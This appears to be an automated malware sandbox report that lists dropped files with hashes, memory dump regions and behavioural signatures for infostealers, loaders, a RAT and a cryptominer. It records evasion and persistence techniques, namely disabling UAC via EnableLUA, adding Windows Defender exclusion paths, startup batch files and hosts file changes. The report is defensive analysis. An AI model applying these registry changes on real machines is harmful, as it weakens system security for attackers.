SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

\Users\Admin\AppData\Local\Lina Text\linatext.exe

MD5 8de714eb1d0fa5863a4b381d75f3bcbf
SHA1 b4458157e70dc88f04de54af02601f15264f3471
SHA256 9af658094a2e04fa3c5819f8e1c555b08db0e3c0148468750bf9815609a77389
SHA512 a283801bf9f41c8fe491a4741965730a5bf7332134feeb029ea5fdf943b2a729eed4989d63b41ae123c41152f6d35a875179b2be34d4c64ceb38e57223b64075

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

MD5 a9bcee36c5af28740985533cb316fe51
SHA1 74a2bf47ce0ff1613cb5f76590250f1216858f7d
SHA256 349e9d6fd6b82db6bd0fdc57fb2f8ec62b1bc60162307540f2eca4ed703a1ff5
SHA512 b3c372a5adb66ccb8ffe112509fd4f34faf1be23fca45711eff5f1832ec11c2d700cdf30136cf50f734a022f2e0d4c493d1d9c438d61503a0eeacdd989d7fec1

memory/1572-233-0x0000000003390000-0x000000000353A000-memory.dmp

memory/1656-234-0x0000000000400000-0x00000000005AA000-memory.dmp

C:\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe

MD5 e6f35f87546012b23b3cacfb69e8179d
SHA1 72fdf02d6bae31d171c59762178e78f9be3e1407
SHA256 9d20c1da3e0af2d513f15ba25b6733045fc402c1355028c0e8c0f43bfd061b3f
SHA512 b6d92b76844194d889fc05ce5cd838beab643e43e585ffe0e50e9bcace457e680f53844fe5ec5c372d7aade213f6984d539cbd2a20801114c34d27b8b4a99eba

C:\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe

MD5 7a4055b2ee962cdd9ee1302e59bcee8f
SHA1 82f8a2099421803843994dda03845716846f521e
SHA256 b75b196604d46c127572d2c86a4597eafb16110fec95ef7958ba8f9acfa0ceb7
SHA512 bc84a3502afdadc5f46f60296b9947f6338e8ca5d7d7a74806a54ad06646e7836c9cb6b1d3b51e7045e9b4ee24fbca80c172fb60ae15efcf8e9e52c29de9e554

\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe

MD5 6686099ed77f42160963d104a5145541
SHA1 3f211f59ac4649a45649dbcf236517212f8c01b6
SHA256 038ffe960f56d5e377aa14625396f83f77dfd4161db766cf70a68036382daafd
SHA512 662638d035e5797facfb0a1d608415b0aa6529b50d13779be94d48af776259287a09aaf4ceb906ce599fe024f33a07b61b9067ca716b8f4fffa69a6c4e1a934e

memory/1176-281-0x000000001AF00000-0x000000001AF80000-memory.dmp

memory/2312-282-0x00000000005B0000-0x00000000005B1000-memory.dmp

memory/1316-304-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/1316-305-0x0000000000220000-0x0000000000247000-memory.dmp

memory/1316-316-0x0000000000400000-0x000000000063B000-memory.dmp

memory/1484-317-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1096-330-0x00000000005A0000-0x00000000006A0000-memory.dmp

memory/1096-331-0x0000000000220000-0x000000000022B000-memory.dmp

memory/3044-332-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1096-333-0x0000000000400000-0x000000000047E000-memory.dmp

memory/1572-334-0x0000000000400000-0x00000000004B8000-memory.dmp

\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 eee5ddcffbed16222cac0a1b4e2e466e
SHA1 28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5
SHA256 2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54
SHA512 8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc

memory/3044-374-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3044-376-0x0000000005350000-0x0000000005880000-memory.dmp

memory/1316-369-0x0000000000400000-0x000000000063B000-memory.dmp

memory/2500-377-0x0000000074670000-0x0000000074D5E000-memory.dmp

memory/1480-388-0x0000000000400000-0x0000000000930000-memory.dmp

memory/2500-399-0x00000000004A0000-0x00000000004E0000-memory.dmp

memory/1480-400-0x00000000003C0000-0x00000000003C1000-memory.dmp

memory/1316-411-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/1656-413-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/1656-417-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/1656-421-0x0000000000400000-0x00000000005AA000-memory.dmp

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

MD5 46a2a317bf37202e525d7b69f128292d
SHA1 ecff24d3a5c8bf3325067925f8a58161f4888593
SHA256 d73cde63e319c78de5d2f17fa4f84114ea53aaa1169074cea37761bf5d8d253c
SHA512 11f02984b25b6c3b47e5926904fb3c305d28b16d42ff9d4a09787f4f0bf916fdded0cfd7917c42e3d16d1a9f9b67f49a442afdae3c7933d5afe591e7fdd29cf6

memory/1552-426-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/1096-428-0x0000000000400000-0x000000000047E000-memory.dmp

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

MD5 7ae32340c855948c1e201cbc53b6182e
SHA1 482a29ea5d0dedea6adc295ae6cbb78905bd199c
SHA256 890b3b3d31090e102e0b917428f34550e55681ab845b7efef9e05d526eab0872
SHA512 030a222f02853b64b4be615f623f46884a0aac0b000b51494dd80bbbe3adb4c2287284dbe1a58aaa3b52f09c83095a2fd8b4676788ad68b90fba7e23d7075b4e

memory/1216-423-0x00000000030D0000-0x00000000030E6000-memory.dmp

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

memory/1316-465-0x0000000000400000-0x000000000063B000-memory.dmp

memory/1480-466-0x0000000000400000-0x0000000000930000-memory.dmp

memory/1572-467-0x0000000003390000-0x000000000353A000-memory.dmp

memory/1552-468-0x0000000000400000-0x00000000005AA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1bf0d3a15ff332d88e8b4253622ceee8
SHA1 c6887789852dc30f781d1993330b1f0c1283d8db
SHA256 abebaf5331a824a5d44681df742f15a606078eb40e729fb7cca3622854e2d85c
SHA512 77a31e73c2c7fa752de33fa51e86378d69f68b87db39b44d06717890cfcecbf62ea321118799b132046676518da88f50ac773b984549fbb03c80953ce59f42f8

memory/2832-474-0x000000001B2B0000-0x000000001B592000-memory.dmp

memory/2832-478-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/2832-479-0x000007FEECB80000-0x000007FEED51D000-memory.dmp

memory/2832-480-0x0000000002580000-0x0000000002600000-memory.dmp

memory/2832-481-0x000007FEECB80000-0x000007FEED51D000-memory.dmp

memory/2832-483-0x0000000002580000-0x0000000002600000-memory.dmp

memory/1552-482-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/1316-484-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2832-485-0x0000000002580000-0x0000000002600000-memory.dmp

memory/2832-486-0x0000000002580000-0x0000000002600000-memory.dmp

memory/2832-487-0x000007FEECB80000-0x000007FEED51D000-memory.dmp

\ProgramData\Google\Chrome\updater.exe

MD5 3e7c2a4d0bcdfd0ebb68099b69ba6a1e
SHA1 2e84a7726776962e8b3bc7634a3466beb97dad60
SHA256 d66556c562556133b108b75f46cc43175a931ffd3f1a246a00add22771561a82
SHA512 35423dc5dfdb7e323808d39657e2b4339c4dff35fdbbd5874aaa47cf34248bd8221d5dda47226015e668940ac56f82f2c4ee0b6c65fc977c41608274396eaed2

C:\ProgramData\Google\Chrome\updater.exe

MD5 2f2279c065bde2a2461ac3556f3a932a
SHA1 4a0225991ab0a0c433ca8d26b8a1c268a423f6c8
SHA256 3987eadccd2ae19265f6a17e4236638bd87f7567d7dc9d28688baa3e2815b709
SHA512 54eff48a0bdc15eedbd0635055a2d4ffca544fc5b1e954e1bef9875b23b345fc260f336d9b57c88e11b27dd840104b1f977b05a29b2d0096462393c48e09e15a

\ProgramData\Google\Chrome\updater.exe

MD5 d4b59b2514c29b7aae833a179e357db5
SHA1 ae7591f78e0498677607a8bb6b4cddc8dd600ff8
SHA256 f8e4db884486e19e19a83b381516c84837a286b588b0a863c620009c991a81a4
SHA512 6ce966d17204f23e4904e650c3e12f6d618f4aaeed13f89a6fa11f82888fb32ff39ccd8794093375de080cd41bb43072dc9637af0df2d96d585642d3bda3cef3

C:\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe

MD5 3daf41d4d31073533bc7bd9f7b7e1bbd
SHA1 c12de5f20decd93a55dbf671e8199f75e49d2a7e
SHA256 df94f979f574faf983fb1a57931ce033b6aff8c622d91615818882f46aa68469
SHA512 126eba98469254edb39332ecdf81e273d516367d888b60157b0b9cea298c3d9d7dd546cc1076d0149c3569d065564183d6ce3924682a7d0515ff2b1aef1ddc18

memory/808-494-0x0000000019AB0000-0x0000000019D92000-memory.dmp

memory/3044-496-0x0000000005350000-0x0000000005880000-memory.dmp

memory/808-495-0x0000000000DA0000-0x0000000000DA8000-memory.dmp

memory/808-500-0x000007FEED520000-0x000007FEEDEBD000-memory.dmp

memory/808-501-0x0000000000970000-0x00000000009F0000-memory.dmp

memory/808-502-0x000007FEED520000-0x000007FEEDEBD000-memory.dmp

memory/808-503-0x0000000000970000-0x00000000009F0000-memory.dmp

memory/808-505-0x0000000000970000-0x00000000009F0000-memory.dmp

memory/808-506-0x000007FEED520000-0x000007FEEDEBD000-memory.dmp

memory/808-504-0x0000000000970000-0x00000000009F0000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

memory/3052-512-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3052-513-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3052-516-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1576-517-0x0000000140000000-0x0000000140848000-memory.dmp

C:\ProgramData\Google\Chrome\updater.exe

MD5 2ecd35e671515e32803ff3134c35472c
SHA1 f29e89eb88bc838532daa62c4a0a66bb1b55cd88
SHA256 afa9f43e3414679dc00e2d686bfabf9f3922f9953db2146b78d79871eaed644d
SHA512 7ec1b4d9ae8ab7d6be8f97071a54d66f1cd62343228daa36cf3ee74bcdd04adddf89d6f02600a975315c25720ca997fcf56e6a1849b54681cdf920e07ce846c0

memory/1576-519-0x0000000140000000-0x0000000140848000-memory.dmp

memory/3052-511-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3052-510-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3052-509-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1576-520-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1576-521-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1576-527-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1480-530-0x0000000000400000-0x0000000000930000-memory.dmp

\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe

MD5 52a05602e0093eaa24a4db7f185d6545
SHA1 8ab3992de25a998930e082e0ee4afe387501de1a
SHA256 5fe003d6de06f75c7cbbf73c06f511949f11022daae1395dfcfa866eb470bd1b
SHA512 1d60b1f378b75c83b0042d5d46004727daf62187153cf1f9230077be0dd36aafa179e696f4f74293aff19d25b7cf426c36876b210e030e6696e8d4394a616dbf

C:\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe

MD5 872e0f015c90ead6b8ff86252c7bc5d6
SHA1 7714be85510a02429d3ed25b314bff57af4b2551
SHA256 967748328e5a598a313ac056c564f953a4d2216fe69d6d842519a913e547e96a
SHA512 fbc5f00cdfa8e4650660f850066810a51a4339f3d15b66608ef06dd09fa521d6a2d4b6bdfd91cf04ca4820133bb7ea44e9384735905dffeca3e582dd548baa74

C:\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe

MD5 752bd9944bd5887173a60f0c1494f4b8
SHA1 35ffc1d589d1b23e87b749fa2d214725d6e4f608
SHA256 d49acfcf3ec008255bd18ce31bf4db897bdd710dcebdfef7bd8e54bea4c480b8
SHA512 5a6f10d0726471cba77b3db3ec2ab1e717ed2baaa08c25e40482a132685eaf4812823670ab7d3cc27f7935abeadae1c7a4cd6735fa3a34d2d4f2873dde60a457

C:\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe

MD5 92a102a56f28633895cb6a0913923595
SHA1 e5a6a1272f17e48a6348c72417e0553ff11ffadd
SHA256 c112de02f2e8f28541ab96ce665170d140e9f0d8ed2a9511c7bd40d7238bb270
SHA512 fd06a88cec0564183be001bf7b73b676a2beac7eafc7be4754dd3a9d8614170d2b274ef76cb5b7d28c6a98e97c8b21c2a3742b0a87569422d16e5861d5cd3d3a

\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe

MD5 6ff88de77f88b4dfcb1680a89c959b64
SHA1 4e937f29bfe7905e929141c56765c03c1883ec3d
SHA256 98e9bbbe1874725431fba64925c3f2e485f6f5fed4f796c7b40bfc4b751b876e
SHA512 87958132918b86eb2afb1d8dcf08c573f81b6c4014c10bc1690680108046903e35a799aef2d1535f3b27c18fb60dd4c87d977b2ecbdec652e5cddf6845875b77

\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe

MD5 fcf589b32ece0fee62d5b512c279256b
SHA1 8cde918112796505b8733f4d349dc55235fd4c88
SHA256 02fdd0151ad925700f35aa9350a91d3f0b408fba8263188d7845972b72ac7ead
SHA512 ad5b91b47fd23d76bc4a1e59fcfd704ffd782ed78181b0b33cc674adc7cf2ae51c318f4e287e7d4cf5ec4a6c8ed33871de93a91ccc95eb91e3656c416f21cbf6

\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe

MD5 6ec87b2cc595eeefcf0cf0c171ea5865
SHA1 7e9a2c8ad7b1025088432f6034a6d973e0fe7009
SHA256 bd2d342e00fd9855f52169ac9f7fa8fb00b9dad82f0ca9eea1a6598a8caa15c3
SHA512 50674e1cb89a11e60d8669ae29bb90287136f73c7934dc9865690219b740f723dec48b86ccdbc3283804a031b8640ef3c0e76cb373d0fec8077da85403001825

memory/1480-556-0x00000000003C0000-0x00000000003C1000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS344A.tmp\Install.exe

MD5 58cab5bf52fb504b3f59588688c0311d
SHA1 94e01c814e4c7a80e4c4a74299280e59ee359973
SHA256 0bf67a79e2359d3c3cc25d168146f2a1a6c463d842f2d4b263628216ed5f6540
SHA512 dbce20d0887744762357aec164583fe5943d168ac025f8a1c800b201cb22f1208d435e5f5cd06243e4776cd3cf53596f078e74b95b6c600e22499923512abce8

\Users\Admin\AppData\Local\Temp\7zS344A.tmp\Install.exe

MD5 28fb38ede0e7e09e00547008f60bc605
SHA1 8a5c86bb89dddcf17b4bfc6edb3920ab08d7cf87
SHA256 344c7fa7aa0a8e86e3a64f2eba7fe4b7ae38ba530fd108c67541d0acdd192a76
SHA512 16c92fd6ed06afe41e01880e73ac4cc392323a7445150ce856491b955a382e899c1f416691b6c61d1447479d4d51a4618aeb2256927950540eb8ea09af869adf

C:\Users\Admin\AppData\Local\Temp\7zS344A.tmp\Install.exe

MD5 99af8307816eb62d3d64fc5fac4c6729
SHA1 bd7a0529c630ba98fd47f0550083eb0117e3f1fa
SHA256 9fac10d8993258fcb806797f3a1e8f9584633e788fc5f9c2a59261216fc7d884
SHA512 d8f793131dafe8f39343af1db4bae6d0d6252afede6bbdad0d692da523410bc3ff43a60de8fa080d9a7778aea5d8aaaf42a12afbfb078f50fe5d655664bdf72b

\Users\Admin\AppData\Local\Temp\7zS344A.tmp\Install.exe

MD5 a9ef473b85b114d3e075b24921e78a11
SHA1 5a888173017106340e61b1a904f796d1f28661de
SHA256 a6c806cb30503992dc9445680344dbad8287e6d340bdec0ad1150022abb0910d
SHA512 2ca9227210a99e0a43b9b13fcdcb8001aedd54fea4f78d1e5dc87904cb1ea2b9d0f510163beb567b0d51665cc425e165dedc31a1d657e4ef940a019772339ce7

\Users\Admin\AppData\Local\Temp\7zS344A.tmp\Install.exe

MD5 2947728c3a6a526ce8d8705b7427ab90
SHA1 ebb3d56f05a058321c2a22643c626565d400b069
SHA256 4262989890604afe35ab334de86d00d719de67da24fd18fcc007c883a5deaeb3
SHA512 001f68d9a1f05a763b577fe5ea152983af888758b43c70e61091434646605ea4c23cf4fcfedcde6e6c7c20b6c6f25e365a0a6117b811596f0d6d7cfbb4fe0d5e

\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 954c1117ef90aed5a93ca8aefe5c8648
SHA1 c7fd0d7e8a861783a2002a490efd262f3e8a895d
SHA256 8a65867b836857d4690a6b8d57b493496365c178963d0e0e8a5f01074c291ef9
SHA512 2ccc8f7d22c3d15881d2276f14d8c2b6cd2e391f6f0ab47ce7f4ea44ebe1a95a07e58b84634d32edb210aa6efd709b97bd0dcff222fc6c5822b829e22ac8c213

C:\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 009603a0104bf07163f1c6139ac16a59
SHA1 10be7b8a4611a042dcda9045fcf883cfc90b7fe9
SHA256 2a053abba3d8e1563d7ab9e4ad49dc65e5870ecf804584d7195e1fd7eae01bc0
SHA512 a21f4df5ad07054de75416cbdfee90af45319bbd95a1bc99c672efdaaa3176ba946c06b2f42a1d8798edda50e77f75afbec0d672572a9dff9fb51596d33188ad

\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 c23ae6e28c3935ae7de4657753d3edbe
SHA1 096623b57ebb336e4e24200fa93106842658e451
SHA256 7ad079fff988f59e73ff27db95ea1804873bb93f9e9a89f9878bb3b9b90c3e52
SHA512 9e19d3e4ecb441e3dccb5773d7504aba3c2dc7a5fd4b35cbd157747e4f32e94f183bdf3fcd4f5e20bf79ea9c08fa8686a3da9acb7b47f7e714ddb6ee6aa1b845

\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 1fda35506b7a6c1ab5a016daf4e04139
SHA1 4e58119941cb8717e27b13890bc05a23f9a30492
SHA256 8306bea0eb43d3dd303ed0e5f4c7444e605774d3001bc35f8330422477b5e29b
SHA512 93daf83ad09a170e16cb775420ab11b1512cf8faeb99fbc10f599f3acfe7f8c45d9c71c52bc7057e647f038f6134f9f718be3a714b81c70d8c2edda93434a4f4

\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 fe173c9bc6024a9ae1d9929cb2b42505
SHA1 8562210af4402e1dceb87a412cc852a52839f90e
SHA256 eda131033cd55d566ed96279c8e0540a385b4022879675527ca940d80deebeb6
SHA512 a7ad93be6ca558d79ae4362d7a7fceae5a59128cbb8e0bbd18f0074384e1b47b83d0a6947f0ee9d0c81de7c4ef7a1ef269a31e7b56560e4fb935f7e97ec3ad59

C:\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 e895cd3c15b7536f0d2b1c7b79f81222
SHA1 82b772cd4db6b767239dab863cdab70bd35aa064
SHA256 8ebd38a158c4c824f3798c3b75620a7d0eef69b91f757662f4a4f6481e918a1b
SHA512 e05006969a997430d11c1285e29e48ccd52b972d11fd86f44632a7902503644067edd05e6a7a8f4850763e338b9728c477c7048d9ab63fd1e9651fc25edb1319

\ProgramData\nss3.dll

MD5 7b7f0a10b1a4a80dc48841a826bd0ea6
SHA1 a5ec81941e7f3194964505759f3988521c66568c
SHA256 659f716d08a416f1091664f7264caf55652a7ca86abf9d53295a98b0f72f54e0
SHA512 2933f667861e17667e122481598dff52054afb3da85e0557666d6b60388e8f3de025a64e3cd740031c1656c76a1832f89d9139fcfac246c6064b28779cd2a207

\ProgramData\mozglue.dll

MD5 808187ecda753649e06cc1b8eb3f08ff
SHA1 b4928c1082a7c2bf994640112cd1a1775ed53f09
SHA256 c734c3b473d9e34f830a694ffed13612c256450a2a4bb7497dd9c7cc96fb7fb3
SHA512 9a9d7bf955a441fe5bb779403e0e1f144215aa620c8b50f3dd48e350f8718bfb62144a39827b31333db9ab4fcccbc74b3f9aaf4a430cf781fd3f1bf86c530be0

memory/1576-597-0x00000000007C0000-0x00000000007E0000-memory.dmp

memory/1552-596-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/1576-598-0x0000000000BD0000-0x0000000000BF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4D55.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

memory/1316-628-0x00000000007E0000-0x00000000008E0000-memory.dmp

\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe

MD5 634689da3c5d52294c61ed157dad45ef
SHA1 5f2d059addbcfffc07a51fee3c320395251b927c
SHA256 bb61bda60bdf02c3d432ff5ce7d46bfbcd8a203fd19cc21670422b02a708930c
SHA512 a06eb7027c96318cf1cafee13ee770cae45281962a7252383203f79505318ebf6dda06f0eea4a7df5bd8824175992c3a12a7ec8ecbccdde941c082c26aaceda8

C:\Users\Admin\AppData\Local\Temp\8C78.exe

MD5 ae597691370226cc4354b9897415b115
SHA1 3e89b4b1d81cdae205ac96f151bf3dc0fe3337ae
SHA256 10f5ba78f4d86b82127e167fee1ea0e6b26dd087ecfe933bda24e5d2685ad675
SHA512 f2db423695272ea3519d6329965baf4f0eee6dda62820406ecafcc13385380cb6279c097a8a610163835a181f845ccac7982c7f867b90abc5b553968b3ac7f24

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe

MD5 37ee8ae952e7329a17778e42e82e4aa4
SHA1 58361de906707372eb165a8e40c3db1c87e1258f
SHA256 2934cd388c6ecbd34ca20d76ec4a8823a904bb748551368260e5b3613f69cb5e
SHA512 48c223f151af2a5949ad66b79da28e8550b07155b002e31ac7af566ae287d06dfcf5b5baa83e9c77c850aedda96c9c18e757db4c8d31f62e744992cf1eb1b0a7

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-15 02:01

Reported

2024-03-15 02:03

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4WujRaZGRrpshjaTNeyFxoy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUo7DmsI28Drtz3mNGD5uOAu.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oGaKBCTfWiLMwW1zKMcIP3rc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v9CupCzEBDEI1PrvrnKsTxy1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QBUMczUi2Pf941DefaINrAvS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TI15w0gLkpZoqvO6wRGoe3gP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IKiCs9k3lloeS5vcLyYa2j1X.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yjE7yT7UVOSceR9MaY75fPuX.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Socks5Systemz

botnet socks5systemz

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

xmrig

miner xmrig

Detect binaries embedding considerable number of MFA browser extension IDs.

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables (downloaders) containing URLs to raw contents of a paste

Detects executables packed with VMProtect.

Detects executables packed with or using KoiVM

UPX dump on OEP (original entry point)

XMRig Miner payload

miner

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe N/A
File created C:\Windows\system32\drivers\etc\hosts C:\ProgramData\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe N/A
